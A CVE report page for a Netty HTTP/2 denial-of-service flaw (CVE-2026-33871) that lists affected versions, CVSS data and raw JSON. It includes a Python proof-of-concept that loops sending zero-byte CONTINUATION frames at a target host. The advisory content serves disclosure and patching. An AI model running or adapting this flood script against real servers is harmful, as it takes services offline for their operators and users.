Security Vulnerability Report
CVE-2026-33871 (CVSS 7.5, HIGH)

Published: 2026-03-27 20:16:35
Last Modified: 2026-03-30 20:10:18

Description

Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows a user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE (Netty 4.1.x < 4.1.132.Final)
cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:* - VULNERABLE (Netty 4.2.x < 4.2.10.Final)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Conceptual PoC for CVE-2026-33871
# This script demonstrates the logic of flooding zero-byte CONTINUATION frames.
# Target: A vulnerable Netty HTTP/2 server

def send_http2_flood(target_ip, target_port):
    try:
        # 1. Establish TCP connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        print(f"Connected to {target_ip}:{target_port}")

        # 2. Send HTTP/2 Connection Preface
        preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
        s.send(preface)

        # 3. Send HTTP/2 SETTINGS frame (Simplified for demonstration)
        # Length: 0, Type: 0x4 (SETTINGS), Flags: 0x0, Stream: 0
        settings_frame = bytes([0, 0, 0, 0x4, 0x0, 0, 0, 0, 0])
        s.send(settings_frame)

        # 4. Send HEADERS frame to open a stream (Simplified)
        # Length: 0, Type: 0x1 (HEADERS), Flags: 0x4 (End Headers), Stream: 1
        headers_frame = bytes([0, 0, 0, 0x1, 0x4, 0, 0, 0, 1])
        s.send(headers_frame)

        # 5. Flood CONTINUATION frames
        # The vulnerability is triggered by sending a stream of zero-length CONTINUATION frames.
        # Type: 0x9 (CONTINUATION), Stream: 1
        print("Starting flood of zero-byte CONTINUATION frames...")
        while True:
            # Frame Header: Length(3 bytes) + Type(1 byte) + Flags(1 byte) + Stream ID(4 bytes)
            # Length = 0, Type = 0x9, Flags = 0x0, Stream ID = 1
            frame_header = bytes([0, 0, 0, 0x9, 0x0, 0, 0, 0, 1])
            s.send(frame_header)
    except KeyboardInterrupt:
        print("\nStopping attack.")
        s.close()
    except Exception as e:
        print(f"Error: {e}")

# Note: Actual exploitation requires proper HTTP/2 state management,
# but this snippet illustrates the resource consumption mechanism.
# send_http2_flood("127.0.0.1", 8080)
```

References

https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33871", "sourceIdentifier": "[email protected]", "published": "2026-03-27T20:16:34.833", "lastModified": "2026-03-30T20:10:17.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.132", "matchCriteriaId": "8F551B7E-5E29-4062-8FDB-AA1377B3E8F5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.10", "matchCriteriaId": "419E92FA-6271-4613-AF3D-CF09ADFF2E13"}]}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}